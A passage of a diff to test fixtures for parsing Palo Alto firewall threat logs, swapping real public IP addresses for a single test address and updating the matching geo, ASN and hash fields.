+ "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "created": "2013-03-25T23:59:32.000-04:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -9954,23 +9936,25 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 40428,
+ "number": 4837,
 "organization": {
- "name": "Pandora Media, Inc"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
- "ip": "208.85.40.48"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "rule1"
@@ -9986,7 +9970,7 @@
 },
 "ip": "192.168.0.2"
 },
- "message": "192.168.0.2,208.85.40.48,0.0.0.0,0.0.0.0,rule1,picard,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:50:17,28264,1,57502,80,0,0,0x200000,tcp,alert,\"internal-tuner.pandora.com\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:50:17,28264,1,57502,80,0,0,0x200000,tcp,alert,\"internal-tuner.pandora.com\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -10027,7 +10011,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:c67I85z1uJV7VW6M9MR5Q8fjHQM=",
+ "community_id": "1:ej0sWBrryoi/pHYI/R8rvOEHNQc=",
 "transport": "tcp",
 "application": "pandora",
 "direction": "inbound"
@@ -10063,14 +10047,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "208.85.40.48",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:37:05.545837761Z",
- "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:50:12,192.168.0.2,208.85.40.48,0.0.0.0,0.0.0.0,rule1,picard,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:50:17,28264,1,57502,80,0,0,0x200000,tcp,alert,\"internal-tuner.pandora.com\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+ "ingested": "2021-12-09T13:42:59.079430400Z",
+ "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:50:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:50:17,28264,1,57502,80,0,0,0x200000,tcp,alert,\"internal-tuner.pandora.com\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
 "created": "2013-03-25T23:59:32.000-04:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -10107,25 +10091,27 @@
 "source": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
- "ip": "74.125.224.198"
+ "ip": "175.16.199.1"
 },
- "message": "74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -10166,7 +10152,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:w5GKumufuJCv3Gw8bvP3vTxap24=",
+ "community_id": "1:lX77aiJ1H3y+5//PYYCh3tYdAyc=",
 "transport": "tcp",
 "application": "google-maps",
 "direction": "outbound"
@@ -10201,15 +10187,15 @@
 "picard"
 ],
 "ip": [
- "74.125.224.198",
+ "175.16.199.1",
 "192.168.0.2",
 "0.0.0.0"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:37:05.545845078Z",
- "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:58:18,74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "ingested": "2021-12-09T13:42:59.079433800Z",
+ "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:58:18,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "created": "2013-03-25T23:59:32.000-04:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -10246,28 +10232,27 @@
 "source": {
 "nat": {},
 "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-V",
- "city_name": "Oliva",
- "country_iso_code": "ES",
- "country_name": "Spain",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "Ukraine",
- "region_name": "Valencia",
+ "region_name": "Jilin",
 "location": {
- "lon": -0.1193,
- "lat": 38.9197
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 12357,
+ "number": 4837,
 "organization": {
- "name": "Vodafone Spain"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
- "ip": "188.190.124.75"
+ "ip": "175.16.199.1"
 },
- "message": "188.190.124.75,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,\"about.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0,",
+ "message": "175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,\"about.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0,",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -10308,7 +10293,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:a7oyQr47OdJP8ZnG9SCELvH8aco=",
+ "community_id": "1:TrrVRDnZdCQgLAGLHO4GHt2+qw4=",
 "transport": "tcp",
 "application": "web-browsing",
 "direction": "outbound"
@@ -10343,15 +10328,15 @@
 "jordy"
 ],
 "ip": [
- "188.190.124.75",
+ "175.16.199.1",
 "192.168.0.6",
 "0.0.0.0"
 ]
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-08T12:37:05.545852351Z",
- "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 08:22:27,188.190.124.75,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,\"about.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0,",
+ "ingested": "2021-12-09T13:42:59.079438200Z",
+ "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 08:22:27,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,\"about.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0,",
 "created": "2013-03-25T23:59:32.000-04:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -10388,25 +10373,27 @@
 "source": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
- "ip": "74.125.224.200"
+ "ip": "175.16.199.1"
 },
- "message": "74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -10447,7 +10434,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:yyAK8WOE46l0/k8dVOECI6qa2zQ=",
+ "community_id": "1:dbOGjR1aWV8DyP4vLGz1QsZ0ny0=",
 "transport": "tcp",
 "application": "google-maps",
 "direction": "outbound"
@@ -10482,15 +10469,15 @@
 "picard"
 ],
 "ip": [
- "74.125.224.200",
+ "175.16.199.1",
 "192.168.0.2",
 "0.0.0.0"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:37:05.545862329Z",
- "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "ingested": "2021-12-09T13:42:59.079443200Z",
+ "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "created": "2013-03-25T23:59:37.000-04:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -10527,25 +10514,27 @@
 "source": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
- "ip": "74.125.239.3"
+ "ip": "175.16.199.1"
 },
- "message": "74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -10586,7 +10575,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:15fj8zz0nlNi/Fnz8ibhS9Ihqdg=",
+ "community_id": "1:mtzOFl1R3JVEIPm0akw/TS3ROok=",
 "transport": "tcp",
 "application": "google-maps",
 "direction": "outbound"
@@ -10621,15 +10610,15 @@
 "picard"
 ],
 "ip": [
- "74.125.239.3",
+ "175.16.199.1",
 "192.168.0.2",
 "0.0.0.0"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:37:05.545871646Z",
- "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "ingested": "2021-12-09T13:42:59.079448300Z",
+ "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "created": "2013-03-25T23:59:37.000-04:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -10666,25 +10655,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.239.3" + "ip": "175.16.199.1" }, - "message": "74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -10725,7 +10716,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:fl9AVyrQeXPX/eoeKOy+6/UoR8M=", + "community_id": "1:/n7j8c8MKf35yw9cDwEnJ7VUlqI=", "transport": "tcp", "application": "google-maps", "direction": "outbound" 
@@ -10760,15 +10751,15 @@ "picard" ], "ip": [ - "74.125.239.3", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545880255Z", - "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079452200Z", + "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -10805,25 +10796,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.200" + "ip": "175.16.199.1" }, - "message": "74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -10864,7 +10857,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:cHzYL+SCc86AntedL6fbRx+2wzE=", + "community_id": "1:gPWVl9L6vD63Bmbr0WIBMb7WLdc=", "transport": "tcp", "application": "google-maps", "direction": "outbound" 
@@ -10899,15 +10892,15 @@ "picard" ], "ip": [ - "74.125.224.200", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545887616Z", - "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:16:03,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079456700Z", + "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:16:03,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -10930,23 +10923,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.239.6" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -10962,7 +10957,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,74.125.239.6,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:18:19,19448,1,52366,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:18:19,19448,1,52366,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -11003,7 +10998,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:pRuFj5DzdmtFceU+OTawbYPhbJg=", + "community_id": "1:ALFdhF5T8C5nvWPkG0y4cS0/5QM=", "transport": "tcp", "application": "google-analytics", "direction": "inbound" 
@@ -11039,14 +11034,14 @@ ], "ip": [ "192.168.0.2", - "74.125.239.6", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545894834Z", - "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:18:14,192.168.0.2,74.125.239.6,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:18:19,19448,1,52366,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079460900Z", + "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:18:14,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:18:19,19448,1,52366,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -11083,25 +11078,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.193" + "ip": "175.16.199.1" }, - "message": "74.125.224.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -11142,7 +11139,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:e27i7C6aBac+TOOJNFkXsvos7v0=", + "community_id": "1:e4r6wJ1eOAxh+oapONp3HAqGoiw=", "transport": "tcp", "application": "google-maps", "direction": "outbound" 
@@ -11177,15 +11174,15 @@ "picard" ], "ip": [ - "74.125.224.193", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545901930Z", - "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,74.125.224.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079464700Z", + "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -11222,25 +11219,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.239.20" + "ip": "175.16.199.1" }, - "message": "74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,\"nav_logo107.png\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,\"nav_logo107.png\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -11281,7 +11280,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:I0nRW7fXHKg0He8sWEMh90mqrd8=", + "community_id": "1:qFLy3+Xm+Yir6ObFGBuWtDh9Ryo=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" 
